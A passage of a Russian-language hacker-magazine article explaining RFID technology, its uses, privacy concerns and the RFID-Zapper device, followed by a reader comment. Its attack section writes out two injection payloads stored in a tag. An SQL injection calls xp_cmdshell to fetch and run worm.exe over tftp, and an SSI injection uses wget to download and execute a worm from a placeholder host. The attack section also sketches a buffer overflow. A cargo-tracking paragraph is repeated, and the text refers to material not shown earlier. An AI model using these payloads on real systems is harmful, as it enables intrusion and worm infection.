интересная статья. Начать повествование я решил с краткого описания технологии RFID. Вообще, RFID или Radio Frequency IDentification (радиочастотная идентификация) — это метод удаленного хранения и получения информации путем передачи радиосигналов с помощью устройств называемых RFID-метками. История появления данной технологии восходит к первой половине XX столетия. Британские ВВС еще в начале Второй мировой использовали подобную технологию, устанавливая на самолеты устройства радиочастотной идентификации, позволяющие эффективно отличать свои авиационные юниты от самолетов противника. Есть так же сведения, что в СССР в 50-х годах похожая технология использовалась для шпионажа. С 60-х годов начинаются исследования о возможности применения RFID в гражданских целях, а первая радиометка, аналогичная применяемым сегодня, была создана в научной лаборатории Лос Аламос в 1973 году. Принцип работы RFID-систем весьма прост. Данные системы включают в себя два основных компонента: считыватель (ридер) и идентификатор (метка, чип, тег). Ридер излучает электромагнитную энергию. Метка улавливает этот сигнал и передает ответный, который уже принимается антенной ридера. По своему типу системы RFID подразделяются на пассивные и интерактивные. В пассивной системе излучение считывателя постоянно во времени (т.е. не модулировано) и служит только источником питания для радиометки, которая собственного источника энергии не имеет. Получив энергию от ридера, метка включается и передает сигнал, который принимается считывателем. Вышеописанным способом работает большинство систем управления доступом, где необходимо только получить серийный номер идентификатора. Более продвинутые RFID-системы используют интерактивный режим работы. Ридер в таких системах излучает модулированные колебания, то есть формирует запрос. RFID-метка дешифрирует запрос, обрабатывает его, и, если это необходимо, формирует соответствующий ответ. Подобные системы необходимы, например, для работы с товарами, маркированными радиометками. Дело в том, что если система пассивная, то при попадании одновременно нескольких меток под излучение ридера их сигналы накладываются друг на друга и возникает коллизия. Интерактивные же системы снабжены механизмом антиколлизии. Интерактивные RFID-теги часто имеют встроенную батарею, заряда которой может хватить на несколько лет. Интерактивные метки с собственным источником питания называют активными, а те, что без него полупассивными. RFID-метки можно подразделить на несколько категорий. Во-первых, по используемому диапазону радиочастот на: * - низкочастотные (125 или 134.2 КГц); * - высокочастотные (13.56 МГц); * - UHF, т.е. ультравысокочастотные (868-956 МГц); * - микроволновые (2.45 ГГц). Во-вторых, по размерам встроенной памяти, которая может быть от 4 байт до 4 Кб, кроме того метка может иметь память только для чтения или же с возможностью дозаписи и перезаписи информации. Существует несколько стандартов RFID-меток, сформировавшихся на сегодняшний день. Важным свойством радиометки является и ее размер, который может составлять всего 0.4х0.4 мм для пассивных меток, в то время как активные метки имеют размер с монету. Применяться RFID может в самых разных областях. Во-первых, СКУД, т.е. системы контроля и управлением доступом. Исторически это было первым применением технологии RFID. Сегодня доступ в офис или дом с помощью proximity-карты со встроенным радиочипом уже вполне обычное дело. Большинство подобных систем используют пассивные метки и работают в низкочастотном диапазоне, хотя в последнее время все чаще встречаются интерактивные системы на частотах 13.56 МГц. Реально новое направление в этой области - создание RFID-имплантантов для людей. Первый эксперимент такого рода был проведен еще в 1988, а сегодня компания Applied Digital Solution предлагает любому желающему имплантировать себе в руку свою разработку - VeriChip. Во-вторых, это контроль за перевозкой грузов и конкретных товаров, их складской учет. Представь только, как просто будет проходить ревизия на складах или в супермаркетах - достаточно пройтись с ридером вдоль полок с товарами и все автоматически будет переучтено в БД товаров. Существует стандарт RFID называемый EPC (electronic product code), являющийся аналогом штрих-кодов. Специалисты считают, что в ближайшее десятилетие RFID-метка на каждом отдельном товаре станет таким же обычным явлением как сегодня штрих-код. Как это всегда бывает, у технологии, подобной RFID, появляется множество сторонников и противников. Несмотря на все удобства, привносимые применением RFID, у многих людей ее внедрение вызывает большие опасения. И не зря. Во-первых, радиометки по сути своей являются радиомаяками - ведь именно в этом качестве их использовала советская разведка в 50-х. И незаконное слежение еще не единственное, что вызывает опасения, гораздо большие опасения вызывает безопасность самой технологии. Сам Брюс Шнайер, на планы оснащения паспортов RFID-метками, заявил, что "это чистая угроза национальной безопасности". Во-вторых, это контроль за перевозкой грузов и конкретных товаров, их складской учет. Представь только, как просто будет проходить ревизия на складах или в супермаркетах - достаточно пройтись с ридером вдоль полок с товарами и все автоматически будет переучтено в БД товаров. Существует стандарт RFID называемый EPC (electronic product code), являющийся аналогом штрих-кодов. Специалисты считают, что в ближайшее десятилетие RFID-метка на каждом отдельном товаре станет таким же обычным явлением как сегодня штрих-код. Еще одна очень важная область применения RFID - это электронные документы. Государства многих стран, в том числе и России, планируют уже в самое ближайшее время начать встраивать RFID-метки в паспорта своих граждан. При этом в память имплантированной в паспорт метки будут заноситься не только обычные данные владельца (ФИО, год рождения и т.д.), но и биометрические признаки, а также цветное фото. Настоящие хакеры смотрели на проблему несколько иначе. Двое немецких компьютерщиков MiniMe и Mahajivana, состоящие в рядах "Хаоса", решили, что лучший способ обезопасить себя от угроз, которые может принести технология RFID, это простое уничтожение RFID-меток. Наиболее действенным способом убийства радиометок, обнаруженным хакерами, оказался помещение их на короткое время в микроволновку. Но далеко не любой предмет со встроенным RFID-чипом засунешь в микроволновую печь, поэтому был разработан девайс, названный RFID-Zapper. Создатели устройства решили, что стоимость его должна быть минимальна, поэтому использовали в качестве основы одноразовый фотоаппарат-мыльницу, который сможет раздобыть любой желающий. После некоторых усовершенствований вспышка такого фотоаппарата научилась создавать сильное электромагнитное поле наповал убивающее пассивные радиометки. Правда, пока только 13,56-мегагерцовые, но создатели Zapper'а обещают дальнейшее развитие проекта. RFID-Zapper вызвал большой интерес на состоявшемся некоторое время назад европейском 22-ом слете хакеров CCC, как у хакеров так и у прессы. Атаки через RFID-метки Но несанкционированное чтение и клонирование меток это еще не все возможные тонкие места RFID-систем. Редактирование содержимого RFID-метки может позволить злоумышленнику осуществить самые разнообразные атаки на компьютеры, работающие с RFID. Уязвимыми местами RFID-систем могут стать базы данных, которые могут быть подвержены sql-инъекциям; web-интерфейсы - здесь возможны различные виды внедрения вредоносного кода; не исключена возможность атак типа buffer overflow. Наиболее просто реализуема атака типа sql-injection. Допустим, приложение работающее с RFID записывает на метку какую-то информацию, например, если это коробка с товаром, об ее содержимом - "beer". Вот пример атаки на win-систему, уязвимую к sql-inj: хакер изменяет значение тега на "beer'; EXEC Master..xp_cmdshell cd \Windows\Temp & tftp -i <здесь ip> GET worm.exe & worm.exe;" и загружает (конечно, если машина подключена к инету) таким образом червя в систему с БД товаров при считывании информации с метки. Аналогично происходят атаки на системы, имеющие интерфейс, основанный на веб-компонентах. К примеру, внедрение через метку кода "<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm "-->" в уязвимую linux-систему с SSI повторяет вышеописанную атаку на винду. Как ты уже понял, эти атаки практически ничем не отличаются от аналогичных атак на сайты в инете. Еще пример. Допустим, в RFID-системе используются только метки с объемом памяти 128 байт. Программист, писавший приложение, обрабатывающее содержимое тегов, поленился сделать проверку на длину этого самого содержимого. В итоге имеется возможность для переполнения буфера - ведь хитрый хакер может подсунуть системе метку с большим количеством памяти, чем 128 байт, внедрив туда и шелл-код. Вышеприведенные сценарии атак я позаимствовал на сайте www.rfidvirus.org. На этом сайте выкладываются результаты исследований уже упомянутой в статье группы ученых во главе с профессором Э.Таненбаумом. Главной целью их исследований было создание вируса, распространяющегося через RFID. И им это удалось - первый концептуальный вирус, не получивший названия, был создан в лаборатории амстердамского университета.
Интересно было бы посмотреть на такой хардварный exploit в живую, не факт что в системах имеющих широкий доступ применяются веб компоненты (причем уязвимые) и используются карты с достаточным количеством памяти, хотя идея безусловно заслуживает внимания
